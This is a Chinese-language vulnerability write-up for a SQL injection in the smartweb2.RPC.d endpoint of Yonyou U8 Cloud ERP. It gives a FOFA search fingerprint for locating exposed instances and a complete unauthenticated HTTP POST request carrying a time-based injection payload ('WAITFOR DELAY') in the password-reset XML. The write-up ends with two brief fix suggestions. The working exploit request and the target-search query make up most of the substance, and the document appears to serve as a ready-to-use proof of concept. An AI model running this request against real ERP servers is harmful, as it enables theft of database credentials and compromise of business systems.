用友U8 Cloud smartweb2.RPC.d SQL注入漏洞

产品介绍

用友U8cloud是用友推出的新一代云ERP，主要聚焦成长型、创新型、集团型企业，提供企业级云ERP整体解决方案。它包含ERP的各项应用，包括iUAP、财务会计、iUFO cloud、供应链与质量管理、人力资源、生产制造、管理会计、资产管理，以及电商通、U会员、U订货、友云采、友报账、友空间、友人才等用友云服务。

漏洞描述

用友U8 Cloud smartweb2.RPC.d接口存在SQL注入漏洞，未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证，最终可能导致服务器失陷。

资产测绘

app=“用友-U8-Cloud”

漏洞复现

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: your_ip
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 476

__type=updateData&__viewInstanceId=nc.bs.hrss.login.ResetPassword~nc.bs.hrss.login.ResetPasswordViewModel&__xml=<rpc%20transaction="10" method="resetPwd"><def><dataset type="Custom" id="dsResetPwd"><f name="user"></f><f name="ID"></f></dataset></def><data><rs dataset="dsResetPwd"><r id="10009" state="insert"><n><v>1';WAITFOR DELAY '0:0:3'--</v><v>test</v></n></r></rs></data><vps><p name="__profileKeys">findPwd;e10adc3949ba59abbe56e057f20f883e</p></vps></rpc>&1700109885028

成功延时3秒后执行数据库语句。

修复建议

1.升级至系统最新版本。
2.部署Web应用防火墙，对数据库操作进行监控。